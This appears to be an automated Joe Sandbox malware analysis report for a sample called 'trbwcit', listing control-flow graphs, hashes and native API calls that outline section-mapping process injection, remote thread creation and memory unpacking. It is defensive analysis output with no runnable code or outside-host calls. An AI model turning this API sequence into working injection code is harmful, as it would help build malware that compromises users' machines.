                                                            control_flow_graph 245 401542-40156e call 401193 254 401570 245->254 255 401573-401578 245->255 254->255 257 401898-4018a0 255->257 258 40157e-40158f 255->258 257->255 263 4018a5-4018b7 257->263 261 401595-4015be 258->261 262 401896 258->262 261->262 272 4015c4-4015db NtDuplicateObject 261->272 262->263 268 4018c5 263->268 269 4018bc-4018e3 call 401193 263->269 268->269 272->262 273 4015e1-401605 NtCreateSection 272->273 276 401661-401687 NtCreateSection 273->276 277 401607-401628 NtMapViewOfSection 273->277 276->262 278 40168d-401691 276->278 277->276 279 40162a-401646 NtMapViewOfSection 277->279 278->262 282 401697-4016b8 NtMapViewOfSection 278->282 279->276 283 401648-40165e 279->283 282->262 285 4016be-4016da NtMapViewOfSection 282->285 283->276 285->262 287 4016e0 call 4016e5 285->287
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 289 401549-40156e call 401193 293 401570 289->293 294 401573-401578 289->294 293->294 296 401898-4018a0 294->296 297 40157e-40158f 294->297 296->294 302 4018a5-4018b7 296->302 300 401595-4015be 297->300 301 401896 297->301 300->301 311 4015c4-4015db NtDuplicateObject 300->311 301->302 307 4018c5 302->307 308 4018bc-4018e3 call 401193 302->308 307->308 311->301 312 4015e1-401605 NtCreateSection 311->312 315 401661-401687 NtCreateSection 312->315 316 401607-401628 NtMapViewOfSection 312->316 315->301 317 40168d-401691 315->317 316->315 318 40162a-401646 NtMapViewOfSection 316->318 317->301 321 401697-4016b8 NtMapViewOfSection 317->321 318->315 322 401648-40165e 318->322 321->301 324 4016be-4016da NtMapViewOfSection 321->324 322->315 324->301 326 4016e0 call 4016e5 324->326
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 328 401557 329 40155b-40156e call 401193 328->329 330 40154f-401554 328->330 333 401570 329->333 334 401573-401578 329->334 330->329 333->334 336 401898-4018a0 334->336 337 40157e-40158f 334->337 336->334 342 4018a5-4018b7 336->342 340 401595-4015be 337->340 341 401896 337->341 340->341 351 4015c4-4015db NtDuplicateObject 340->351 341->342 347 4018c5 342->347 348 4018bc-4018e3 call 401193 342->348 347->348 351->341 352 4015e1-401605 NtCreateSection 351->352 355 401661-401687 NtCreateSection 352->355 356 401607-401628 NtMapViewOfSection 352->356 355->341 357 40168d-401691 355->357 356->355 358 40162a-401646 NtMapViewOfSection 356->358 357->341 361 401697-4016b8 NtMapViewOfSection 357->361 358->355 362 401648-40165e 358->362 361->341 364 4016be-4016da NtMapViewOfSection 361->364 362->355 364->341 366 4016e0 call 4016e5 364->366
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 372 402f97-402fbb 373 402fc1-402fd9 372->373 374 4030ee-4030f3 372->374 373->374 375 402fdf-402ff0 373->375 376 402ff2-402ffb 375->376 377 403000-40300e 376->377 377->377 378 403010-403017 377->378 379 403039-403040 378->379 380 403019-403038 378->380 381 403062-403065 379->381 382 403042-403061 379->382 380->379 383 403067-40306a 381->383 384 40306e 381->384 382->381 383->384 385 40306c 383->385 384->376 386 403070-403075 384->386 385->386 386->374 387 403077-40307a 386->387 387->374 388 40307c-4030eb RtlCreateUserThread NtTerminateProcess 387->388 388->374
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 66 2cc003c-2cc0047 67 2cc004c-2cc0263 call 2cc0a3f call 2cc0e0f call 2cc0d90 VirtualAlloc 66->67 68 2cc0049 66->68 83 2cc028b-2cc0292 67->83 84 2cc0265-2cc0289 call 2cc0a69 67->84 68->67 86 2cc02a1-2cc02b0 83->86 88 2cc02ce-2cc03c2 VirtualProtect call 2cc0cce call 2cc0ce7 84->88 86->88 89 2cc02b2-2cc02cc 86->89 95 2cc03d1-2cc03e0 88->95 89->86 96 2cc0439-2cc04b8 VirtualFree 95->96 97 2cc03e2-2cc0437 call 2cc0ce7 95->97 99 2cc04be-2cc04cd 96->99 100 2cc05f4-2cc05fe 96->100 97->95 102 2cc04d3-2cc04dd 99->102 103 2cc077f-2cc0789 100->103 104 2cc0604-2cc060d 100->104 102->100 106 2cc04e3-2cc0505 102->106 107 2cc078b-2cc07a3 103->107 108 2cc07a6-2cc07b0 103->108 104->103 109 2cc0613-2cc0637 104->109 117 2cc0517-2cc0520 106->117 118 2cc0507-2cc0515 106->118 107->108 110 2cc086e-2cc08be LoadLibraryA 108->110 111 2cc07b6-2cc07cb 108->111 112 2cc063e-2cc0648 109->112 116 2cc08c7-2cc08f9 110->116 114 2cc07d2-2cc07d5 111->114 112->103 115 2cc064e-2cc065a 112->115 119 2cc0824-2cc0833 114->119 120 2cc07d7-2cc07e0 114->120 115->103 121 2cc0660-2cc066a 115->121 122 2cc08fb-2cc0901 116->122 123 2cc0902-2cc091d 116->123 124 2cc0526-2cc0547 117->124 118->124 128 2cc0839-2cc083c 119->128 125 2cc07e4-2cc0822 120->125 126 2cc07e2 120->126 127 2cc067a-2cc0689 121->127 122->123 129 2cc054d-2cc0550 124->129 125->114 126->119 130 2cc068f-2cc06b2 127->130 131 2cc0750-2cc077a 127->131 128->110 132 2cc083e-2cc0847 128->132 138 2cc0556-2cc056b 129->138 139 2cc05e0-2cc05ef 129->139 133 2cc06ef-2cc06fc 130->133 134 2cc06b4-2cc06ed 130->134 131->112 135 2cc0849 132->135 136 2cc084b-2cc086c 132->136 140 2cc06fe-2cc0748 133->140 141 2cc074b 133->141 134->133 135->110 136->128 142 2cc056d 138->142 143 2cc056f-2cc057a 138->143 139->102 140->141 141->127 142->139 146 2cc057c-2cc0599 143->146 147 2cc059b-2cc05bb 143->147 150 2cc05bd-2cc05db 146->150 147->150 150->129
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CC024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2cc0000_trbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: eb4fb2c8579feb1d98d09637ed203926217431dc0c01c4b43d6d7397d26ae795
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 83526974A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 368 415792-415920 GetModuleHandleW GetProcAddress VirtualProtect
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
                                                            • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
                                                            • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-3916222277
                                                            • Opcode ID: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
                                                            • Instruction ID: d67ab6015398af25ee4ccbcaa24419cc1747ddacc62f126d36a823bcbb263e11
                                                            • Opcode Fuzzy Hash: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
                                                            • Instruction Fuzzy Hash: 81313E20A5B680CBF301CB78F8047823B62BB65744F548479D5498B3A5EBBA4534E7EF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 371 4157e0-415920 GetModuleHandleW GetProcAddress VirtualProtect
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
                                                            • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
                                                            • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-3916222277
                                                            • Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
                                                            • Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 389 2d5a516-2d5a52f 390 2d5a531-2d5a533 389->390 391 2d5a535 390->391 392 2d5a53a-2d5a546 CreateToolhelp32Snapshot 390->392 391->392 393 2d5a556-2d5a563 Module32First 392->393 394 2d5a548-2d5a54e 392->394 395 2d5a565-2d5a566 call 2d5a1d5 393->395 396 2d5a56c-2d5a574 393->396 394->393 399 2d5a550-2d5a554 394->399 400 2d5a56b 395->400 399->390 399->393 400->396
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D5A53E
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 02D5A55E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D57000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2d57000_trbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: c5928409bd92c8df353fa4d9b97dbac4470e974a2d57e09443486761d062729e
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: DDF096315007306FDB203BF9A88CF6E76E8FF89665F140629EA43915C0DBB0ED458A61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 402 2cc0e0f-2cc0e24 SetErrorMode * 2 403 2cc0e2b-2cc0e2c 402->403 404 2cc0e26 402->404 404->403
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02CC0223,?,?), ref: 02CC0E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02CC0223,?,?), ref: 02CC0E1E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2cc0000_trbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 59145803a341f42eb765d6959b20131ad0ef228589562980b91258829723d85c
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 72D01231145128B7D7003A94DC09BCD7B1CDF05B66F108011FB0DD9080C770964046E5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 405 4018e6-40194b call 401193 Sleep call 40141f 419 40195a-4019a5 call 401193 405->419 420 40194d-401955 call 401514 405->420 420->419
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 434 401915-401918 435 4018c6-4018c7 434->435 436 40191a-40194b call 401193 Sleep call 40141f 434->436 437 4018d7 435->437 438 4018ce-4018e3 call 401193 435->438 448 40195a-4019a5 call 401193 436->448 449 40194d-401955 call 401514 436->449 437->438 449->448
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 463 4018f1-40194b call 401193 Sleep call 40141f 473 40195a-4019a5 call 401193 463->473 474 40194d-401955 call 401514 463->474 474->473
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D5A226
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D57000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2d57000_trbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: f978338136a82dcaecd83e5d0e5a4f0410a0b572ec96a3ec953c3269d6f5484d
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: E0112779A00218EFDB01DF98C985E98BBF5AF08350F1580A4FA489B361D771EA90DF90
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E4B), ref: 004157B8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
                                                            • Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14
                                                            APIs
                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 004159E1
                                                            • WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A05
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A0D
                                                            • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A4D
                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415A61
                                                            • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A6F
                                                            • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A7E
                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd
                                                            Similarity
                                                            • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                            • String ID: -
                                                            • API String ID: 113859268-2547889144
                                                            • Opcode ID: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
                                                            • Instruction ID: 11b84fe8b2b04f3d00d3004244583e2a87b640e11e3fb3d6ac6cb40e453acbe7
                                                            • Opcode Fuzzy Hash: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
                                                            • Instruction Fuzzy Hash: 7821F731A84308EBD720DF94DC86BD97B70EF4C752F1181AAFA49AA1C0CAB459C4CB59
                                                            APIs
                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B04
